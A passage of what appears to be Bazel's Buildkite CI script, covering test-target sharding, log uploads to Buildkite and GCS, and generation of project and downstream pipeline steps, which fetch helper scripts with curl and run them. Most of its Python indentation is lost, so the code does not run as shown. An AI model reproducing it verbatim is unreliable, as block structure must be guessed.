":female-detective: Calculating targets for shard {}/{}".format(
shard_id + 1, shard_count
)
)
expanded_test_targets = expand_test_target_patterns(bazel_binary, platform, test_targets)
test_targets = get_targets_for_shard(expanded_test_targets, shard_id, shard_count)
return build_targets, test_targets, index_targets
def expand_test_target_patterns(bazel_binary, platform, test_targets):
included_targets, excluded_targets = partition_targets(test_targets)
excluded_string = (
" except tests(set({}))".format(" ".join("'{}'".format(t) for t in excluded_targets))
if excluded_targets
else ""
)
exclude_manual = ' except tests(attr("tags", "manual", set({})))'.format(
" ".join("'{}'".format(t) for t in included_targets)
)
eprint("Resolving test targets via bazel query")
output = execute_command_and_get_output(
[bazel_binary]
+ common_startup_flags(platform)
+ [
"--nomaster_bazelrc",
"--bazelrc=/dev/null",
"query",
"tests(set({})){}{}".format(
" ".join("'{}'".format(t) for t in included_targets),
excluded_string,
exclude_manual,
),
],
print_output=False,
).strip()
return output.split("\n") if output else []
def partition_targets(targets):
included_targets, excluded_targets = [], []
for target in targets:
if target.startswith("-"):
excluded_targets.append(target[1:])
else:
included_targets.append(target)
return included_targets, excluded_targets
def get_targets_for_shard(test_targets, shard_id, shard_count):
# TODO(fweikert): implement a more sophisticated algorithm
return sorted(test_targets)[shard_id::shard_count]
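# Sketch of the partitioning and sharding above, using hypothetical labels:
# partition_targets(["//foo/...", "-//foo:flaky_test"]) returns
# (["//foo/..."], ["//foo:flaky_test"]), and with shard_count=2 the sorted, expanded
# test targets are distributed round-robin: shard 0 takes indices 0, 2, 4, ... and
# shard 1 takes indices 1, 3, 5, ...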
def execute_bazel_test(
bazel_version,
bazel_binary,
platform,
flags,
targets,
bep_file,
monitor_flaky_tests,
incompatible_flags,
):
aggregated_flags = [
"--flaky_test_attempts=3",
"--build_tests_only",
"--local_test_jobs=" + concurrent_test_jobs(platform),
]
# Don't enable remote caching if the user enabled remote execution / caching themselves
# or flaky test monitoring is enabled, as remote caching makes tests look less flaky than
# they are.
print_collapsed_group(":bazel: Computing flags for test step")
aggregated_flags += compute_flags(
platform,
flags,
# When using bazelisk --migrate to test incompatible flags,
# incompatible flags set by "INCOMPATIBLE_FLAGS" env var will be ignored.
[] if (use_bazelisk_migrate() or not incompatible_flags) else incompatible_flags,
bep_file,
bazel_binary,
enable_remote_cache=not monitor_flaky_tests,
)
print_expanded_group(":bazel: Test ({})".format(bazel_version))
try:
execute_command(
[bazel_binary]
+ bazelisk_flags()
+ common_startup_flags(platform)
+ ["test"]
+ aggregated_flags
+ ["--"]
+ targets
)
except subprocess.CalledProcessError as e:
handle_bazel_failure(e, "test")
def get_json_profile_flags(out_file):
return [
"--experimental_generate_json_trace_profile",
"--experimental_profile_cpu_usage",
"--experimental_json_trace_compression",
"--profile={}".format(out_file),
]
def upload_bep_logs_for_flaky_tests(test_bep_file):
if has_flaky_tests(test_bep_file):
build_number = os.getenv("BUILDKITE_BUILD_NUMBER")
pipeline_slug = os.getenv("BUILDKITE_PIPELINE_SLUG")
execute_command(
[
gsutil_command(),
"cp",
test_bep_file,
FLAKY_TESTS_BUCKET + pipeline_slug + "/" + build_number + ".json",
]
)
def upload_test_logs_from_bep(bep_file, tmpdir, stop_request):
uploaded_targets = set()
while True:
done = stop_request.is_set()
if os.path.exists(bep_file):
all_test_logs = test_logs_for_status(bep_file, status=["FAILED", "TIMEOUT", "FLAKY"])
test_logs_to_upload = [
(target, files) for target, files in all_test_logs if target not in uploaded_targets
]
if test_logs_to_upload:
files_to_upload = rename_test_logs_for_upload(test_logs_to_upload, tmpdir)
cwd = os.getcwd()
try:
os.chdir(tmpdir)
test_logs = [os.path.relpath(file, tmpdir) for file in files_to_upload]
test_logs = sorted(test_logs)
execute_command(["buildkite-agent", "artifact", "upload", ";".join(test_logs)])
finally:
uploaded_targets.update([target for target, _ in test_logs_to_upload])
os.chdir(cwd)
if done:
break
time.sleep(5)
def upload_json_profile(json_profile_path, tmpdir):
if not os.path.exists(json_profile_path):
return
print_collapsed_group(":gcloud: Uploading JSON Profile")
execute_command(["buildkite-agent", "artifact", "upload", json_profile_path], cwd=tmpdir)
def upload_corrupted_outputs(capture_corrupted_outputs_dir, tmpdir):
if not os.path.exists(capture_corrupted_outputs_dir):
return
print_collapsed_group(":gcloud: Uploading corrupted outputs")
execute_command(
["buildkite-agent", "artifact", "upload", "{}/**/*".format(capture_corrupted_outputs_dir)],
cwd=tmpdir,
)
def rename_test_logs_for_upload(test_logs, tmpdir):
# Rename the test.log files to the target that created them
# so that it's easy to associate test.log and target.
new_paths = []
for label, files in test_logs:
attempt = 0
if len(files) > 1:
attempt = 1
for test_log in files:
try:
new_path = test_label_to_path(tmpdir, label, attempt)
os.makedirs(os.path.dirname(new_path), exist_ok=True)
copyfile(test_log, new_path)
new_paths.append(new_path)
attempt += 1
except IOError as err:
# Log error and ignore.
eprint(err)
return new_paths
def test_label_to_path(tmpdir, label, attempt):
# remove leading //
path = label.lstrip("/:")
path = path.replace("/", os.sep)
path = path.replace(":", os.sep)
if attempt == 0:
path = os.path.join(path, "test.log")
else:
path = os.path.join(path, "attempt_" + str(attempt) + ".log")
return os.path.join(tmpdir, path)
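# Example mapping performed by test_label_to_path() above: the hypothetical label
# "//foo/bar:baz_test" becomes "<tmpdir>/foo/bar/baz_test/test.log" for attempt 0
# and "<tmpdir>/foo/bar/baz_test/attempt_2.log" for attempt 2.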
def test_logs_for_status(bep_file, status):
targets = []
with open(bep_file, encoding="utf-8") as f:
raw_data = f.read()
decoder = json.JSONDecoder()
pos = 0
while pos < len(raw_data):
try:
bep_obj, size = decoder.raw_decode(raw_data[pos:])
except ValueError as e:
eprint("JSON decoding error: " + str(e))
return targets
if "testSummary" in bep_obj:
test_target = bep_obj["id"]["testSummary"]["label"]
test_status = bep_obj["testSummary"]["overallStatus"]
if test_status in status:
outputs = bep_obj["testSummary"]["failed"]
test_logs = []
for output in outputs:
test_logs.append(url2pathname(urlparse(output["uri"]).path))
targets.append((test_target, test_logs))
pos += size + 1
return targets
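# test_logs_for_status() above reads the BEP file as a stream of concatenated JSON
# objects (one per line) and only looks at these fields; a matching record looks
# roughly like this (abridged, values are hypothetical):
#
#   {"id": {"testSummary": {"label": "//foo:bar_test"}},
#    "testSummary": {"overallStatus": "FLAKY",
#                    "failed": [{"uri": "file:///.../test.log"}]}}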
def execute_command_and_get_output(args, shell=False, fail_if_nonzero=True, print_output=True):
eprint(" ".join(args))
process = subprocess.run(
args,
shell=shell,
check=fail_if_nonzero,
env=os.environ,
stdout=subprocess.PIPE,
errors="replace",
universal_newlines=True,
)
if print_output:
eprint(process.stdout)
return process.stdout
def execute_command(args, shell=False, fail_if_nonzero=True, cwd=None, print_output=True):
if print_output:
eprint(" ".join(args))
return subprocess.run(
args, shell=shell, check=fail_if_nonzero, env=os.environ, cwd=cwd
).returncode
def execute_command_background(args):
eprint(" ".join(args))
return subprocess.Popen(args, env=os.environ)
def terminate_background_process(process):
if process:
process.terminate()
try:
process.wait(timeout=10)
except subprocess.TimeoutExpired:
process.kill()
def create_step(label, commands, platform, shards=1, soft_fail=None):
if "docker-image" in PLATFORMS[platform]:
step = create_docker_step(
label, image=PLATFORMS[platform]["docker-image"], commands=commands
)
else:
step = {
"label": label,
"command": commands,
"agents": {"queue": PLATFORMS[platform]["queue"]},
}
if shards > 1:
step["label"] += " (shard %n)"
step["parallelism"] = shards
if soft_fail is not None:
step["soft_fail"] = soft_fail
# Enforce a global 8 hour job timeout.
step["timeout_in_minutes"] = 8 * 60
# Automatically retry when an agent got lost (usually due to an infra flake).
step["retry"] = {
"automatic": [
{"exit_status": -1, "limit": 3}, # Buildkite internal "agent lost" exit code
{"exit_status": 137, "limit": 3}, # SIGKILL
{"exit_status": 143, "limit": 3}, # SIGTERM
]
}
return step
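# Rough shape of a non-Docker step emitted by create_step() above (the queue name
# comes from PLATFORMS[platform]["queue"] and is shown here as a placeholder):
#
#   label: "<label>"
#   command: [...]
#   agents: { queue: "<platform queue>" }
#   timeout_in_minutes: 480
#   retry:
#     automatic:
#       - { exit_status: -1, limit: 3 }
#       - { exit_status: 137, limit: 3 }
#       - { exit_status: 143, limit: 3 }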
def create_docker_step(label, image, commands=None, additional_env_vars=None):
env = ["ANDROID_HOME", "ANDROID_NDK_HOME", "BUILDKITE_ARTIFACT_UPLOAD_DESTINATION"]
if additional_env_vars:
env += ["{}={}".format(k, v) for k, v in additional_env_vars.items()]
step = {
"label": label,
"command": commands,
"agents": {"queue": "default"},
"plugins": {
"docker#v3.8.0": {
"always-pull": True,
"environment": env,
"image": image,
"network": "host",
"privileged": True,
"propagate-environment": True,
"propagate-uid-gid": True,
"volumes": [
"/etc/group:/etc/group:ro",
"/etc/passwd:/etc/passwd:ro",
"/opt:/opt:ro",
"/var/lib/buildkite-agent:/var/lib/buildkite-agent",
"/var/lib/gitmirrors:/var/lib/gitmirrors:ro",
"/var/run/docker.sock:/var/run/docker.sock",
],
}
},
}
if not step["command"]:
del step["command"]
return step
def print_project_pipeline(
configs,
project_name,
http_config,
file_config,
git_repository,
monitor_flaky_tests,
use_but,
incompatible_flags,
notify,
):
task_configs = configs.get("tasks", None)
if not task_configs:
raise BuildkiteException("{0} pipeline configuration is empty.".format(project_name))
pipeline_steps = []
# If the repository is hosted on Git-on-Borg, we show a link to the commit's Gerrit review
buildkite_repo = os.getenv("BUILDKITE_REPO")
if is_git_on_borg_repo(buildkite_repo):
show_gerrit_review_link(buildkite_repo, pipeline_steps)
task_configs = filter_tasks_that_should_be_skipped(task_configs, pipeline_steps)
# In Bazel Downstream Project pipelines, git_repository and project_name must be specified.
is_downstream_project = (use_but or incompatible_flags) and git_repository and project_name
buildifier_config = configs.get("buildifier")
# Skip Buildifier when we test downstream projects.
if buildifier_config and not is_downstream_project:
buildifier_env_vars = {}
if isinstance(buildifier_config, str):
# Simple format:
# ---
# buildifier: latest
buildifier_env_vars[BUILDIFIER_VERSION_ENV_VAR] = buildifier_config
else:
# Advanced format:
# ---
# buildifier:
# version: latest
# warnings: all
def set_env_var(config_key, env_var_name):
if config_key in buildifier_config:
buildifier_env_vars[env_var_name] = buildifier_config[config_key]
set_env_var("version", BUILDIFIER_VERSION_ENV_VAR)
set_env_var("warnings", BUILDIFIER_WARNINGS_ENV_VAR)
if not buildifier_env_vars:
raise BuildkiteException(
'Invalid buildifier configuration entry "{}"'.format(buildifier_config)
)
pipeline_steps.append(
create_docker_step(
BUILDIFIER_STEP_NAME,
image=BUILDIFIER_DOCKER_IMAGE,
additional_env_vars=buildifier_env_vars,
)
)
# In Bazel Downstream Project pipelines, we should test the project at the last green commit.
git_commit = None
if is_downstream_project:
last_green_commit_url = bazelci_last_green_commit_url(
git_repository, DOWNSTREAM_PROJECTS[project_name]["pipeline_slug"]
)
git_commit = get_last_green_commit(last_green_commit_url)
config_hashes = set()
skipped_due_to_bazel_version = []
for task, task_config in task_configs.items():
platform = get_platform_for_task(task, task_config)
task_name = task_config.get("name")
soft_fail = task_config.get("soft_fail")
# We override the Bazel version in downstream pipelines. This means that two tasks that
# only differ in the value of their explicit "bazel" field will be identical in the
# downstream pipeline, thus leading to duplicate work.
# Consequently, we filter those duplicate tasks here.
if is_downstream_project:
# Skip tasks that require a specific Bazel version
bazel = task_config.get("bazel")
if bazel and bazel != "latest":
skipped_due_to_bazel_version.append(
"{}: '{}'".format(
create_label(platform, project_name, task_name=task_name), bazel
)
)
continue
h = hash_task_config(task, task_config)
if h in config_hashes:
continue
config_hashes.add(h)
shards = task_config.get("shards", "1")
try:
shards = int(shards)
except ValueError:
raise BuildkiteException("Task {} has invalid shard value '{}'".format(task, shards))
step = runner_step(
platform=platform,
task=task,
task_name=task_name,
project_name=project_name,
http_config=http_config,
file_config=file_config,
git_repository=git_repository,
git_commit=git_commit,
monitor_flaky_tests=monitor_flaky_tests,
use_but=use_but,
incompatible_flags=incompatible_flags,
shards=shards,
soft_fail=soft_fail,
)
pipeline_steps.append(step)
if skipped_due_to_bazel_version:
lines = ["\n- {}".format(s) for s in skipped_due_to_bazel_version]
commands = [
"buildkite-agent annotate --style=info '{}' --append --context 'ctx-skipped_due_to_bazel_version'".format(
"".join(lines)
),
"buildkite-agent meta-data set 'has-skipped-steps' 'true'",
]
pipeline_steps.append(
create_step(
label=":pipeline: Print information about skipped tasks due to different Bazel versions",
commands=commands,
platform=DEFAULT_PLATFORM,
)
)
pipeline_slug = os.getenv("BUILDKITE_PIPELINE_SLUG")
all_downstream_pipeline_slugs = []
for _, config in DOWNSTREAM_PROJECTS.items():
all_downstream_pipeline_slugs.append(config["pipeline_slug"])
# We update last green commit in the following cases:
# 1. This job runs on master, stable or main branch (could be a custom build launched manually)
# 2. We intend to run the same job in downstream with Bazel@HEAD (e.g. google-bazel-presubmit)
# 3. This job is not:
# - a GitHub pull request
# - using a custom-built Bazel binary (in the Bazel Downstream Projects pipeline)
# - testing incompatible flags
# - running `bazelisk --migrate` in a non-downstream pipeline
if (
current_branch_is_main_branch()
and pipeline_slug in all_downstream_pipeline_slugs
and not (is_pull_request() or use_but or incompatible_flags or use_bazelisk_migrate())
):
# We need to call "Try Update Last Green Commit" even if there are failures,
# since we don't want a failing Buildifier step to block the update of
# the last green commit for this project.
# try_update_last_green_commit() ensures that we don't update the commit
# if any build or test steps fail.
pipeline_steps.append({"wait": None, "continue_on_failure": True})
pipeline_steps.append(
create_step(
label="Try Update Last Green Commit",
commands=[
fetch_bazelcipy_command(),
PLATFORMS[DEFAULT_PLATFORM]["python"]
+ " bazelci.py try_update_last_green_commit",
],
platform=DEFAULT_PLATFORM,
)
)
if "validate_config" in configs:
pipeline_steps += create_config_validation_steps()
if use_bazelisk_migrate() and not is_downstream_project:
# Print results of bazelisk --migrate in project pipelines that explicitly set
# the USE_BAZELISK_MIGRATE env var, but that are not being run as part of a
# downstream pipeline.
number = os.getenv("BUILDKITE_BUILD_NUMBER")
pipeline_steps += get_steps_for_aggregating_migration_results(number, notify)
print_pipeline_steps(pipeline_steps, handle_emergencies=not is_downstream_project)
def show_gerrit_review_link(git_repository, pipeline_steps):
match = re.search(r"https://(.+?)\.googlesource", git_repository)
if not match:
raise BuildkiteException("Couldn't get host name from %s" % git_repository)
host = match.group(1)
text = "The transformed code used in this pipeline can be found under https://{}-review.googlesource.com/q/{}".format(
host, os.getenv("BUILDKITE_COMMIT")
)
commands = ["buildkite-agent annotate --style=info '{}'".format(text)]
pipeline_steps.append(
create_step(
label=":pipeline: Print information about Gerrit Review Link",
commands=commands,
platform=DEFAULT_PLATFORM,
)
)
def is_git_on_borg_repo(git_repository):
return git_repository and "googlesource.com" in git_repository
def hash_task_config(task_name, task_config):
# Two task configs c1 and c2 have the same hash iff they lead to two functionally identical jobs
# in the downstream pipeline. This function discards the "bazel" field (since it's being
# overridden) and the "name" field (since it has no effect on the actual work).
# Moreover, it adds an explicit "platform" field if that's missing.
cpy = task_config.copy()
cpy.pop("bazel", None)
cpy.pop("name", None)
if "platform" not in cpy:
cpy["platform"] = task_name
m = hashlib.md5()
for key in sorted(cpy):
value = "%s:%s;" % (key, cpy[key])
m.update(value.encode("utf-8"))
return m.digest()
def get_platform_for_task(task, task_config):
# Most pipeline configurations have exactly one task per platform, which makes it
# convenient to use the platform name as task ID. Consequently, we use the
# task ID as platform if there is no explicit "platform" field.
return task_config.get("platform", task)
def create_config_validation_steps():
output = execute_command_and_get_output(
["git", "diff-tree", "--no-commit-id", "--name-only", "-r", os.getenv("BUILDKITE_COMMIT")]
)
config_files = [
path
for path in output.split("\n")
if path.startswith(".bazelci/") and os.path.splitext(path)[1] in CONFIG_FILE_EXTENSIONS
]
return [
create_step(
label=":cop: Validate {}".format(f),
commands=[
fetch_bazelcipy_command(),
"{} bazelci.py project_pipeline --file_config={}".format(
PLATFORMS[DEFAULT_PLATFORM]["python"], f
),
],
platform=DEFAULT_PLATFORM,
)
for f in config_files
]
def print_pipeline_steps(pipeline_steps, handle_emergencies=True):
if handle_emergencies:
emergency_step = create_emergency_announcement_step_if_necessary()
if emergency_step:
pipeline_steps.insert(0, emergency_step)
print(yaml.dump({"steps": pipeline_steps}))
def create_emergency_announcement_step_if_necessary():
style = "error"
message, issue_url, last_good_bazel = None, None, None
try:
emergency_settings = load_remote_yaml_file(EMERGENCY_FILE_URL)
message = emergency_settings.get("message")
issue_url = emergency_settings.get("issue_url")
last_good_bazel = emergency_settings.get("last_good_bazel")
except urllib.error.HTTPError as ex:
message = str(ex)
style = "warning"
if not any([message, issue_url, last_good_bazel]):
return
text = '<span class="h1">:rotating_light: Emergency :rotating_light:</span>\n'
if message:
text += "- {}\n".format(message)
if issue_url:
text += '- Please check this <a href="{}">issue</a> for more details.\n'.format(issue_url)
if last_good_bazel:
text += (
"- Default Bazel version is *{}*, "
"unless the pipeline configuration specifies an explicit version."
).format(last_good_bazel)
return create_step(
label=":rotating_light: Emergency :rotating_light:",
commands=[
'buildkite-agent annotate --append --style={} --context "omg" "{}"'.format(style, text)
],
platform=DEFAULT_PLATFORM,
)
def runner_step(
platform,
task,
task_name=None,
project_name=None,
http_config=None,
file_config=None,
git_repository=None,
git_commit=None,
monitor_flaky_tests=False,
use_but=False,
incompatible_flags=None,
shards=1,
soft_fail=None,
):
command = PLATFORMS[platform]["python"] + " bazelci.py runner --task=" + task
if http_config:
command += " --http_config=" + http_config
if file_config:
command += " --file_config=" + file_config
if git_repository:
command += " --git_repository=" + git_repository
if git_commit:
command += " --git_commit=" + git_commit
if monitor_flaky_tests:
command += " --monitor_flaky_tests"
if use_but:
command += " --use_but"
for flag in incompatible_flags or []:
command += " --incompatible_flag=" + flag
label = create_label(platform, project_name, task_name=task_name)
return create_step(
label=label,
commands=[fetch_bazelcipy_command(), command],
platform=platform,
shards=shards,
soft_fail=soft_fail,
)
def fetch_bazelcipy_command():
return "curl -sS {0} -o bazelci.py".format(SCRIPT_URL)
def fetch_incompatible_flag_verbose_failures_command():
return "curl -sS {0} -o incompatible_flag_verbose_failures.py".format(
INCOMPATIBLE_FLAG_VERBOSE_FAILURES_URL
)
def fetch_aggregate_incompatible_flags_test_result_command():
return "curl -sS {0} -o aggregate_incompatible_flags_test_result.py".format(
AGGREGATE_INCOMPATIBLE_TEST_RESULT_URL
)
def upload_project_pipeline_step(
project_name, git_repository, http_config, file_config, incompatible_flags
):
pipeline_command = (
'{0} bazelci.py project_pipeline --project_name="{1}" ' + "--git_repository={2}"
).format(PLATFORMS[DEFAULT_PLATFORM]["python"], project_name, git_repository)
if incompatible_flags is None:
pipeline_command += " --use_but"
else:
for flag in incompatible_flags:
pipeline_command += " --incompatible_flag=" + flag
if http_config:
pipeline_command += " --http_config=" + http_config
if file_config:
pipeline_command += " --file_config=" + file_config
pipeline_command += " | buildkite-agent pipeline upload"
return create_step(
label="Setup {0}".format(project_name),
commands=[fetch_bazelcipy_command(), pipeline_command],
platform=DEFAULT_PLATFORM,
)
def create_label(platform, project_name, build_only=False, test_only=False, task_name=None):
if build_only and test_only:
raise BuildkiteException("build_only and test_only cannot be true at the same time")
platform_display_name = PLATFORMS[platform]["emoji-name"]
if build_only:
label = "Build "
elif test_only:
label = "Test "
else:
label = ""
platform_label = (
"{0} on {1}".format(task_name, platform_display_name)
if task_name
else platform_display_name
)
if project_name:
label += "{0} ({1})".format(project_name, platform_label)
else:
label += platform_label
return label
def bazel_build_step(
task,
platform,
project_name,
http_config=None,
file_config=None,
build_only=False,
test_only=False,
):
pipeline_command = PLATFORMS[platform]["python"] + " bazelci.py runner"
if build_only:
pipeline_command += " --build_only --save_but"
if test_only:
pipeline_command += " --test_only"
if http_config:
pipeline_command += " --http_config=" + http_config
if file_config:
pipeline_command += " --file_config=" + file_config
pipeline_command += " --task=" + task
return create_step(
label=create_label(platform, project_name, build_only, test_only),
commands=[fetch_bazelcipy_command(), pipeline_command],
platform=platform,
)
def filter_tasks_that_should_be_skipped(task_configs, pipeline_steps):
skip_tasks = get_skip_tasks()
if not skip_tasks:
return task_configs
actually_skipped = []
skip_tasks = set(skip_tasks)
for task in list(task_configs.keys()):
if task in skip_tasks:
actually_skipped.append(task)
del task_configs[task]
skip_tasks.remove(task)
if not task_configs:
raise BuildkiteException(
"Nothing to do since all tasks in the configuration should be skipped."
)
annotations = []
if actually_skipped:
annotations.append(
("info", "Skipping the following task(s): {}".format(", ".join(actually_skipped)))
)
if skip_tasks:
annotations.append(
(
"warning",
(
"The following tasks should have been skipped, "
"but were not part of the configuration: {}"
).format(", ".join(skip_tasks)),
)
)
if annotations:
print_skip_task_annotations(annotations, pipeline_steps)
return task_configs
def get_skip_tasks():
value = os.getenv(SKIP_TASKS_ENV_VAR, "")
return [v for v in value.split(",") if v]
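# Example: if the environment variable named by SKIP_TASKS_ENV_VAR is set to
# "ubuntu2004,windows" (hypothetical task IDs), get_skip_tasks() returns
# ["ubuntu2004", "windows"]; an unset or empty variable yields an empty list.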
def print_skip_task_annotations(annotations, pipeline_steps):
commands = [
"buildkite-agent annotate --style={} '{}' --context 'ctx-{}'".format(s, t, hash(t))
for s, t in annotations
]
pipeline_steps.append(
create_step(
label=":pipeline: Print information about skipped tasks",
commands=commands,
platform=DEFAULT_PLATFORM,
)
)
def print_bazel_publish_binaries_pipeline(task_configs, http_config, file_config):
if not task_configs:
raise BuildkiteException("Bazel publish binaries pipeline configuration is empty.")
pipeline_steps = []
task_configs = filter_tasks_that_should_be_skipped(task_configs, pipeline_steps)
platforms = [get_platform_for_task(t, tc) for t, tc in task_configs.items()]
# These are the platforms that the bazel_publish_binaries.yml config is actually building.
configured_platforms = set(filter(should_publish_binaries_for_platform, platforms))
# These are the platforms that we want to build and publish according to this script.
expected_platforms = set(filter(should_publish_binaries_for_platform, PLATFORMS))
# We can skip this check if we're not on the main branch, because then we're probably
# building a one-off custom debugging binary anyway.
if current_branch_is_main_branch() and not expected_platforms.issubset(configured_platforms):
raise BuildkiteException(
"Bazel publish binaries pipeline needs to build Bazel for every commit on all publish_binary-enabled platforms."
)
# Build Bazel
for task, task_config in task_configs.items():
pipeline_steps.append(
bazel_build_step(
task,
get_platform_for_task(task, task_config),
"Bazel",
http_config,
file_config,
build_only=True,
)
)
pipeline_steps.append("wait")
# If all builds succeed, publish the Bazel binaries to GCS.
pipeline_steps.append(
create_step(
label="Publish Bazel Binaries",
commands=[
fetch_bazelcipy_command(),
PLATFORMS[DEFAULT_PLATFORM]["python"] + " bazelci.py publish_binaries",
],
platform=DEFAULT_PLATFORM,
)
)
print_pipeline_steps(pipeline_steps)
def should_publish_binaries_for_platform(platform):
if platform not in PLATFORMS:
raise BuildkiteException("Unknown platform '{}'".format(platform))
return PLATFORMS[platform]["publish_binary"]
def print_disabled_projects_info_box_step():
info_text = ["Downstream testing is disabled for the following projects :sadpanda:"]
for project, config in DOWNSTREAM_PROJECTS.items():
disabled_reason = config.get("disabled_reason", None)
if disabled_reason:
info_text.append("* **%s**: %s" % (project, disabled_reason))
if len(info_text) == 1:
return None
return create_step(
label=":sadpanda:",
commands=[
'buildkite-agent annotate --append --style=info "\n' + "\n".join(info_text) + '\n"'
],
platform=DEFAULT_PLATFORM,
)
def print_incompatible_flags_info_box_step(incompatible_flags_map):
info_text = ["Build and test with the following incompatible flags:"]
for flag in incompatible_flags_map:
info_text.append("* **%s**: %s" % (flag, incompatible_flags_map[flag]))
if len(info_text) == 1:
return None
return create_step(
label="Incompatible flags info",
commands=[
'buildkite-agent annotate --append --style=info "\n' + "\n".join(info_text) + '\n"'
],
platform=DEFAULT_PLATFORM,
)
def fetch_incompatible_flags():
"""
Return a dict that maps incompatible flags to their GitHub issue URLs; these flags are tested downstream with the current release of Bazel.
"""
incompatible_flags = {}
# If INCOMPATIBLE_FLAGS environment variable is set, we get incompatible flags from it.
if "INCOMPATIBLE_FLAGS" in os.environ:
for flag in os.environ["INCOMPATIBLE_FLAGS"].split():
# We cannot get the GitHub issue link for this flag from INCOMPATIBLE_FLAGS,
# so we just use an empty string as the URL.
incompatible_flags[flag] = ""
return incompatible_flags
bazel_major_version = get_bazel_major_version()
output = subprocess.check_output(
[
"curl",
"https://api.github.com/search/issues?per_page=100&q=repo:bazelbuild/bazel+label:migration-%s"
% bazel_major_version,
]
).decode("utf-8")
issue_info = json.loads(output)
for issue in issue_info["items"]:
# Every incompatible flags issue should start with "<incompatible flag name (without --)>:"
name = "--" + issue["title"].split(":")[0]
url = issue["html_url"]
if name.startswith("--incompatible_"):
incompatible_flags[name] = url
else:
eprint(
f"{name} is not recognized as an incompatible flag, please modify the issue title "
f'of {url} to "<incompatible flag name (without --)>:..."'
)
return incompatible_flags
def get_bazel_major_version():
# Get the Bazel major version on CI, e.g. 0.21 from "Build label: 0.21.0\n..."
output = subprocess.check_output(
["bazel", "--nomaster_bazelrc", "--bazelrc=/dev/null", "version"]
).decode("utf-8")
return output.split()[2].rsplit(".", 1)[0]
def print_bazel_downstream_pipeline(
task_configs, http_config, file_config, test_incompatible_flags, test_disabled_projects, notify
):
if not task_configs:
raise BuildkiteException("Bazel downstream pipeline configuration is empty.")
pipeline_steps = []
task_configs = filter_tasks_that_should_be_skipped(task_configs, pipeline_steps)
pipeline_steps = []
info_box_step = print_disabled_projects_info_box_step()
if info_box_step is not None:
pipeline_steps.append(info_box_step)
if not test_incompatible_flags:
for task, task_config in task_configs.items():
pipeline_steps.append(
bazel_build_step(
task,
get_platform_for_task(task, task_config),
"Bazel",
http_config,
file_config,
build_only=True,
)
)
pipeline_steps.append("wait")
incompatible_flags = None
if test_incompatible_flags:
incompatible_flags_map = fetch_incompatible_flags()
if not incompatible_flags_map:
step = create_step(
label="No Incompatible flags info",
commands=[
'buildkite-agent annotate --style=error "No incompatible flag issue is found on github for current version of Bazel." --context "noinc"'
],
platform=DEFAULT_PLATFORM,
)
pipeline_steps.append(step)
print_pipeline_steps(pipeline_steps)
return
info_box_step = print_incompatible_flags_info_box_step(incompatible_flags_map)
if info_box_step is not None:
pipeline_steps.append(info_box_step)
incompatible_flags = list(incompatible_flags_map.keys())
    pipeline_steps.append(
        create_step(
            label="Print skipped tasks annotation",
            commands=[
                'buildkite-agent annotate --style=info "The following tasks were skipped since they require specific Bazel versions:\n" --context "ctx-skipped_due_to_bazel_version"'
            ],
            platform=DEFAULT_PLATFORM,
        )
    )
for project, config in DOWNSTREAM_PROJECTS.items():
disabled_reason = config.get("disabled_reason", None)
# If test_disabled_projects is true, we add configs for disabled projects.
# If test_disabled_projects is false, we add configs for not disabled projects.
if (test_disabled_projects and disabled_reason) or (
not test_disabled_projects and not disabled_reason
):
pipeline_steps.append(
upload_project_pipeline_step(
project_name=project,
git_repository=config["git_repository"],
http_config=config.get("http_config", None),
file_config=config.get("file_config", None),
incompatible_flags=incompatible_flags,
)
)
    pipeline_steps.append(
        create_step(
            label="Remove skipped tasks annotation if unneeded",
            commands=[
                'buildkite-agent meta-data exists "has-skipped-steps" || buildkite-agent annotation remove --context "ctx-skipped_due_to_bazel_version"'
            ],
            platform=DEFAULT_PLATFORM,
        )
    )
if test_incompatible_flags:
current_build_number = os.environ.get("BUILDKITE_BUILD_NUMBER", None)
if not current_build_number:
raise BuildkiteException("Not running inside Buildkite")
if use_bazelisk_migrate():
pipeline_steps += get_steps_for_aggregating_migration_results(
current_build_number, notify
)
else:
pipeline_steps.append({"wait": "~", "continue_on_failure": "true"})
pipeline_steps.append(
create_step(
label="Test failing jobs with incompatible flag separately",
commands=[
fetch_bazelcipy_command(),
fetch_incompatible_flag_verbose_failures_command(),
PLATFORMS[DEFAULT_PLATFORM]["python"]
+ " incompatible_flag_verbose_failures.py --build_number=%s | buildkite-agent pipeline upload"
% current_build_number,
],
platform=DEFAULT_PLATFORM,
)
)
if (
not test_disabled_projects
and not test_incompatible_flags
and current_branch_is_main_branch()
):
# Only update the last green downstream commit in the regular Bazel@HEAD + Downstream pipeline.
pipeline_steps.append("wait")
pipeline_steps.append(
create_step(
label="Try Update Last Green Downstream Commit",
commands=[
fetch_bazelcipy_command(),
PLATFORMS[DEFAULT_PLATFORM]["python"]
+ " bazelci.py try_update_last_green_downstream_commit",
],
platform=DEFAULT_PLATFORM,
)
)
print_pipeline_steps(pipeline_steps)
def get_steps_for_aggregating_migration_results(current_build_number, notify):
parts = [
PLATFORMS[DEFAULT_PLATFORM]["python"],
"aggregate_incompatible_flags_test_result.py",
"--build_number=%s" % current_build_number,
]
if notify:
parts.append("--notify")
return [
{"wait": "~", "continue_on_failure": "true"},
create_step(
label="Aggregate incompatible flags test result",
commands=[
fetch_bazelcipy_command(),
fetch_aggregate_incompatible_flags_test_result_command(),
" ".join(parts),
],
platform=DEFAULT_PLATFORM,
),
]
def bazelci_builds_download_url(platform, git_commit):
bucket_name = "bazel-testing-builds" if THIS_IS_TESTING else "bazel-builds"
return "https://storage.googleapis.com/{}/artifacts/{}/{}/bazel".format(
bucket_name, platform, git_commit
)
def bazelci_builds_nojdk_download_url(platform, git_commit):
bucket_name = "bazel-testing-builds" if THIS_IS_TESTING else "bazel-builds"
return "https://storage.googleapis.com/{}/artifacts/{}/{}/bazel_nojdk".format(
bucket_name, platform, git_commit
)
def bazelci_builds_gs_url(platform, git_commit):
bucket_name = "bazel-testing-builds" if THIS_IS_TESTING else "bazel-builds"
return "gs://{}/artifacts/{}/{}/bazel".format(bucket_name, platform, git_commit)
def bazelci_builds_nojdk_gs_url(platform, git_commit):
bucket_name = "bazel-testing-builds" if THIS_IS_TESTING else "bazel-builds"
return "gs://{}/artifacts/{}/{}/bazel_nojdk".format(bucket_name, platform, git_commit)
def bazelci_latest_build_metadata_url():
bucket_name = "bazel-testing-builds" if THIS_IS_TESTING else "bazel-builds"
return "gs://{}/metadata/latest.json".format(bucket_name)
def bazelci_builds_metadata_url(git_commit):
bucket_name = "bazel-testing-builds" if THIS_IS_TESTING else "bazel-builds"
